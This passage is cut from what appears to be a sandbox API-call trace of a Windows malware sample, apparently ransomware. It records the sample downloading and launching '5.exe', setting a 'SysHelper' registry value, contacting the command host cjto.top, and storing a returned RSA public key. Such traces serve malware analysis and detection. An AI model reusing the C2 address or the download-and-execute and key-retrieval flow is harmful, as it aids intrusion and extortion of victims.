lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.783] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.784] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.784] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.784] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.785] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.785] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.785] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.785] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.786] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.786] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.786] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.786] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.787] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.787] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.787] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.788] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.788] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.788] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.871] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.871] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.872] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.872] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.873] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.873] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.874] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.874] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.876] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.876] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.876] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.877] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x1e00) returned 1 [0173.948] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x1e00, lpOverlapped=0x0) returned 1 [0173.949] CloseHandle (hObject=0x68c) returned 1 [0173.953] InternetCloseHandle (hInternet=0xcc0030) returned 1 [0173.962] InternetCloseHandle (hInternet=0xcc0028) returned 1 [0173.962] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\5.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0174.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fc38 | out: hHeap=0x2c0000) returned 1 [0174.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0b7f0 | out: hHeap=0x2c0000) returned 1 [0174.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0aba0 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35792b8 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0a798 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3546e68 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3546eb0 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35791d8 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35792f0 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3579210 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3579328 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e920 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312700 | out: hHeap=0x2c0000) returned 1 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0a3d0 | out: hHeap=0x2c0000) returned 1 Thread: id = 101 os_tid = 0x348 [0157.508] timeGetTime () returned 0x11579a3 [0157.508] GetLastError () returned 0x54f [0157.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x35e0f98 [0157.509] GetCurrentThreadId () returned 0x348 [0157.509] SetLastError (dwErrCode=0x54f) [0157.509] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x1023a5e4 | out: phkResult=0x1023a5e4*=0x5a0) returned 0x0 [0157.509] RegQueryValueExW (in: hKey=0x5a0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x1023a5d8, lpData=0x1023a5e0, lpcbData=0x1023a5dc*=0x4 | out: lpType=0x1023a5d8*=0x0, lpData=0x1023a5e0*=0x0, lpcbData=0x1023a5dc*=0x4) returned 0x2 [0157.509] RegSetValueExW (in: hKey=0x5a0, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0x1023a5e0*=0x1, cbData=0x4 | out: lpData=0x1023a5e0*=0x1) returned 0x0 [0157.509] RegCloseKey (hKey=0x5a0) returned 0x0 [0157.509] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1023a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0157.510] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0157.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x3573180 [0157.510] AreFileApisANSI () returned 1 [0157.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1023a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0157.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7a) returned 0x31df78 [0157.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1023a4e4, cbMultiByte=-1, lpWideCharStr=0x31df78, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0157.510] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1023a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0157.510] GetLastError () returned 0x2 [0157.510] GetLastError () returned 0x2 [0157.510] SetLastError (dwErrCode=0x2) [0157.510] GetLastError () returned 0x2 [0157.510] SetLastError (dwErrCode=0x2) [0157.510] GetLastError () returned 0x2 [0157.510] SetLastError (dwErrCode=0x2) [0157.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31df78 | out: hHeap=0x2c0000) returned 1 [0157.511] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0157.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a00bd0 [0157.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x328a10 [0157.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a00bd0 | out: hHeap=0x2c0000) returned 1 [0157.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3579520 [0157.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a04aa8 [0157.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3579520, cbMultiByte=-1, lpWideCharStr=0x3a04aa8, cchWideChar=1056 | out: lpWideCharStr="F8B6CAA3229A0CE4BD2A4C88C3782B79") returned 33 [0157.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x3a052f0 [0157.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a04aa8 | out: hHeap=0x2c0000) returned 1 [0157.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3579520 | out: hHeap=0x2c0000) returned 1 [0157.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3a05b48 [0157.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328a10 | out: hHeap=0x2c0000) returned 1 [0157.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a052f0 | out: hHeap=0x2c0000) returned 1 [0157.511] lstrcpyW (in: lpString1=0x1023af78, lpString2="http://cjto.top/nddddhsspen6/get.php?pid=F8B6CAA3229A0CE4BD2A4C88C3782B79" | out: lpString1="http://cjto.top/nddddhsspen6/get.php?pid=F8B6CAA3229A0CE4BD2A4C88C3782B79") returned="http://cjto.top/nddddhsspen6/get.php?pid=F8B6CAA3229A0CE4BD2A4C88C3782B79" [0157.511] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php?pid=F8B6CAA3229A0CE4BD2A4C88C3782B79", lpString2="&first=true" | out: lpString1="http://cjto.top/nddddhsspen6/get.php?pid=F8B6CAA3229A0CE4BD2A4C88C3782B79&first=true") returned="http://cjto.top/nddddhsspen6/get.php?pid=F8B6CAA3229A0CE4BD2A4C88C3782B79&first=true" [0157.511] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://cjto.top/nddddhsspen6/get.php?pid=F8B6CAA3229A0CE4BD2A4C88C3782B79&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0160.353] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0x1023a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1023a604 | out: lpBuffer=0x1023a778*, lpdwNumberOfBytesRead=0x1023a604*=0x22f) returned 1 [0160.355] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1023a670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0160.355] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0160.355] AreFileApisANSI () returned 1 [0160.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1023a670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0160.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7a) returned 0x31dde0 [0160.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1023a670, cbMultiByte=-1, lpWideCharStr=0x31dde0, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0160.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x1023a47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0160.356] GetFileType (hFile=0x348) returned 0x1 [0160.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31dde0 | out: hHeap=0x2c0000) returned 1 [0160.356] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 559 [0160.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1000) returned 0x3a063f0 [0160.356] WriteFile (in: hFile=0x348, lpBuffer=0x10239118*, nNumberOfBytesToWrite=0x22f, lpNumberOfBytesWritten=0x10238a44, lpOverlapped=0x0 | out: lpBuffer=0x10239118*, lpNumberOfBytesWritten=0x10238a44*=0x22f, lpOverlapped=0x0) returned 1 [0160.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a063f0 | out: hHeap=0x2c0000) returned 1 [0160.357] CloseHandle (hObject=0x348) returned 1 [0160.358] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0160.360] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0160.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a05b48 | out: hHeap=0x2c0000) returned 1 [0160.360] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0160.360] lstrcpyA (in: lpString1=0x1023ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0160.360] lstrcpyA (in: lpString1=0x1023a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0160.360] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.360] lstrlenA (lpString="-----BEGIN PUBLIC 